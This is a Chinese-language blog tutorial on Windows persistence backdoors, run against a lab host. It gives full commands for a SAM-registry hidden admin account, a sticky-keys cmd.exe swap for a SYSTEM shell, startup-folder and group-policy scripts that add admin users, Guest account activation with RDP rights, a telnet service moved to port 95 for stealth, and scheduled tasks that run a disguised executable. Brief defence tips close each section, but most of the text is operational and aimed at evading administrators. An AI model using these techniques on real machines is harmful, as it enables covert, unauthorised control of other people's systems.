Windows留后門維持權限（其中包括詳細的telnet改端口與連接）

題記

       這次按計划輪到權限維持了，想着都試試，結果發現工作量還不小，也算收獲不少，這里印象最深的是又玩了一回telnet，希望大家重點關注這部分還有隱藏賬戶，也很有意思。我已經*號標出來了。

       補天又過了洞了，真不容易，我排名終於進入前3000了。紀念一波，補天洞能過一個可是真不容易，我還是挑的自己看着還行的網站。給你康康。

1 *隱藏賬戶

       隱藏賬戶應該是最常見的后門方式，其設置方式如下：

       首先我們在命令行輸入，如下命令創建一個隱藏賬號

       net user sunny$ 123.com /add

       這個時候，通過net user並不能看到這個賬戶。

       然后我們將它添加到管理員權限。

       net localgroup administrators sunny$ /add

       但是這個"隱藏賬戶"在用戶賬戶中可以看到，並不能騙過細心的管理員。

       這個時候我們可以通過操作注冊表，使這個賬戶在用戶賬戶中也不顯示。首先我們輸入regedit打開注冊表編輯器，找到HKEY_LOCAL_MACHINE\SAM\SAM，我們發現這個時候它是空白的，沒有權限進行操作，所以我們要右鍵權限，將讀寫權限賦予administrator。

       然后我們重啟注冊表編輯器，發現這個時候已經可以訪問了，我們在里面找到剛才創建的sunny$賬號和administrator賬號對應的鍵值類型。

       然后在上一級文件中找鍵值類型對應的目錄，將administrator對應目錄中的F值復制到sunny$對應目錄中的F值。

       復制完成后，把sunny$和其對應的0000003ED目錄先導出並保存。

       然后在命令行中刪除剛才的賬號

       net user sunny$ /del

       最后將剛才導出的注冊表文件重新導入，隱藏賬戶就添加成功了。

       此時在用戶賬戶中看不到這個隱藏賬戶。

       這個時候其實已經完成了，但是我們還可以再走一步操作，那就是把注冊表剛才賦予administrator的權限禁止掉，這樣這個賬戶就很難被發現了。

       鏈接3389，發現已經成功以sunny$賬號登錄目標主機，而且顯示的用戶為administrator。

防范：

       經常檢查用戶賬戶、注冊表關鍵位置。

       將計算機對用戶登陸事件的審核策略打開。

2 shift后門

       shift后門是很常見的留后門手法，其原理是用cmd.exe替換原先粘滯鍵，粘滯鍵的程序sethc.exe可以通過五次shift鍵調用，這樣我們就可以直接通過按五次shift來調用一個system權限的命令行來執行命令、創建用戶等。

       shift后門有着非常豐富的騷操作，我們先來通過一個最基礎的shift后門來學習原理。

       這里要注意粘滯鍵的用戶是trustedinstaller的，首先要更改軟件所有者與管理員的權限。

       更改權限的方法參考這個網址：http://jingyan.baidu.com/article/4665065820f043f549e5f839.html

制作方法如下：

       我們先進入C:\WINDOWS\system32目錄,在這里右鍵打開命令行，依次輸入

       move sethc.exe sethc.exe.bak

       copy cmd.exe sethc.exe

       這兩句命令分別是將粘滯鍵程序備份，然后用cmd.exe覆蓋原本的粘滯鍵程序。

       然后我們每次要使用時按5次shift鍵彈出cmd窗口，可直接以system權限執行系統命令，創建管理員用戶，登錄服務器等。最后每次刪除掉新建的賬戶，減少被發現的概率。

       如圖，我們可以在遠程桌面界面就直接調用cmd：

添加用戶進入

       net user mm$ 123.com /add

       net localgroup administrators mm$ /add

       嘗試登陸。

       操作完刪除用戶。

防范：

       自行呼出粘滯鍵檢查問題。

       禁用粘滯鍵。

3 啟動項后門

       我們可以讓目標機器在每次啟動的時候創建一個賬戶，在這個思路下有很多可以采取的措施，第一種是啟動項：

       在C:\Users\Administrator\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup目錄中，放入我們啟動時要運行的批處理代碼或其他可運行文件，一般是創建一個管理員賬戶：

@echo off

net user hello$ 123.com /add

net localgroup administrators hello$ /add

       保存為start.bat

       因為有所改動，可能圖文不符，但是這是能成功的。（后來補的圖）

       重啟后成功創建用戶

防范：

       定期檢查啟動文件夾內容。

 4 組策略

       我第二種方法是組策略，可以在gpedit.msc中的windows設置-腳本(啟動/關機)中添加新的啟動腳本，在開機時就會自動運行。

       相比於第一種放在啟動目錄中，放在組策略中更加隱蔽，一般不容易引起管理員察覺，從而降低被刪除的概率。

防范：

       定期檢查組策略。

       重啟后我覺得這樣不行，太明目張膽了。還是影子賬戶好使。

5 啟用Guest用戶

       Guest用戶本身就存在於計算機中，但是一般默認禁止，且不可登錄，我們可以通過命令激活Guest用戶並賦予管理員權限，並允許遠程桌面登錄。

net user Guest /active:yes

net user Guest 123.com

net localgroup Administrators Guest /ADD

       gpedit.msc->計算機配置->windows設置->安全設置->本地策略->用戶權限分配->允許通過遠程桌面服務登錄 添加Guest

       成功登錄。

防范：

       定期檢查gpedit.msc->計算機配置->windows設置->安全設置->本地策略->用戶權限分配中關於Guest用戶的權限配置

6 *telnet后門

       如果我們直接打開遠程桌面的3389很容易就會被發現，但是我們打開telnet服務並改變默認端口(23)，就可以做一定程度的隱藏，我們在服務中打開telnet服務，然后將windows服務中的telnet客戶端打開，然后在我們本機打開telnet服務端，訪問目標主機ip和端口並登陸我們的用戶名密碼即可。

       這里的配置如下：192.168.1.132為我們的目標靶機，192.168.1.3為實體機用來連接132。

1、在192.168.1.132上安裝telnet服務。

2、啟動telnet服務。

3、更換telnet端口（改為不是23，增加隱蔽性，這里我改為95）

       tlntadmn config port =95

       如圖重啟服務

       netstat -anp tcp|findstr 95 查看95端口情況

       tlntadmn 查看設置

4、在192.168.1.3開始客戶端。

5、連接132的telnet服務

       telnet 192.168.1.132 95

       因為改掉了端口號，這里需要鏈接95口。

6、鏈接后輸入賬號密碼登錄

7、在服務器端查看95端口情況。

防范：

       定期檢查服務器的進程端口有沒有存在后門程序。

7 計划任務

       schtasks /create /sc ONLOGON /mo modifier /tr C:\Windows\System32\cmd.exe /tn test

7.1 命令解析

       創建新的計划任務。

       schtasks /create

       指定計划類型。有效值為 MINUTE、HOURLY、DAILY、WEEKLY、MONTHLY、ONCE、ONSTART、ONLOGON、ONIDLE。

       /sc schedule

       指定任務在其計划類型內的運行頻率。這個參數對於 MONTHLY 計划是必需的。對於 MINUTE、HOURLY、DAILY 或 WEEKLY 計划，這個參數有效，但也可選。默認值為 1。

       /mo modifier

       指定任務運行的程序或命令。如果忽略該路徑，SchTasks.exe 將假定文件在 Systemroot\System32 目錄下。

       /tr <TaskRun>

       指定任務的名稱。

       /tn <TaskName>

7.2 常用命令

       每分鍾執行一次任務。

       schtasks /create /sc MINUTE /mo 1 /tn calc_update /tr "C:\\Users\\liuxueshuo\\AppData\\Local\\Temp\\calc_update.exe"

       每小時執行一次任務。

       schtasks /create /sc HOURLY /mo 1 /tn calc_update /tr "C:\\Users\\liuxueshuo\\AppData\\Local\\Temp\\calc_update.exe"

       每天執行一次任務。

       schtasks /create /sc DAILY /mo 1 /tn calc_update /tr "C:\\Users\\liuxueshuo\\AppData\\Local\\Temp\\calc_update.exe"

       每周執行一次任務。

       schtasks /create /sc WEEKLY /mo 1 /tn calc_update /tr "C:\\Users\\liuxueshuo\\AppData\\Local\\Temp\\calc_update.exe"

       刪除計划任務。

       schtasks /Delete /TN 任務名稱 /F

參考文章

       windows常用后門技術及防范：http://next.uuzdaisuki.com/2018/06/18/windows常用后門技術及防范/

       Windows 服務器權限維持篇：http://bugfor.com/vuls/4906.html

       linux bash后門奇淫技巧：https://mp.weixin.qq.com/s/cJP3bQbkMrnF2iP9--wpjg

       windows 2008 修改telnet服務端口：http://jingyan.baidu.com/article/29697b9103f45dab21de3c67.html